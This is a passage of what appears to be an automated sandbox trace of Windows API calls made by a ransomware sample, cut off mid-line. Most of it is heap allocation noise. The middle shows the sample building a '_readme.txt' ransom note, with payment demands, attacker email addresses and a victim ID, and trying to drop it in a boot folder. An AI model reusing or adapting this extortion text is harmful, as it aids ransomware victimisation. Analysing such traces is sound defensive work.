[0209.616] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.616] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.616] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.616] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.616] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.616] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.616] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.616] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.616] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.616] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.616] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.616] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.616] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.616] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.616] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.616] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.616] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.616] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.617] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.617] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.617] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.617] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.617] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.617] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.617] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.617] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0209.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.617] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.617] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.617] PathFindFileNameW (pszPath="") returned="" [0209.617] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.617] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.618] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x800) returned 0x3a83058 [0209.618] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32d9428 [0209.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.618] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.618] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0209.618] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.618] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.618] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 0 [0209.620] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a87060 [0209.620] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.620] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.620] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32da538 [0209.620] CreateFileW (lpFileName="C:\\Boot\\de-DE\\_readme.txt" (normalized: "c:\\boot\\de-de\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.620] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32da538 | out: hHeap=0x750000) returned 1 [0209.621] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87060 | out: hHeap=0x750000) returned 1 [0209.621] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.621] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.621] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.621] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.621] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.621] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.621] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0209.621] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.621] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.621] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286440 | out: hHeap=0x750000) returned 1 [0209.621] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286440 [0209.621] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.621] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.621] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.622] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.622] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.622] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.622] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.622] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.622] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.622] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.622] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.622] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.622] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.622] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.622] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.622] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.622] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.622] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.622] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.622] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.622] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.622] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.622] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.622] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.622] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.622] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.622] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.622] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.622] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.623] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.623] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.623] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.623] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.623] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.623] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.623] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.623] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.623] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.623] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.623] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.623] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.623] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.623] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.623] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.623] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.623] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.623] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.623] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.623] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.623] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.623] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.623] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.623] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.623] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.623] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.624] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.624] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.624] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.624] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.624] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.624] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.624] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.624] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.624] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.624] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.624] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.624] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.624] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.624] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.624] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.624] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.624] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.624] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.624] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.624] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.624] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.624] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.624] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.624] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.624] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.624] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.624] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.624] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.625] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.625] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.625] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.625] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.625] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.625] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.625] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.625] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.625] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.625] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.625] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.625] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.625] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.625] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.625] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.625] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.625] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.625] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.625] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.625] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.625] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.625] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.625] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.625] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.625] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.625] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.625] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.625] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.626] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.626] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.626] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.626] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.626] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.626] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.626] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.626] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.626] RtlAllocateHeap 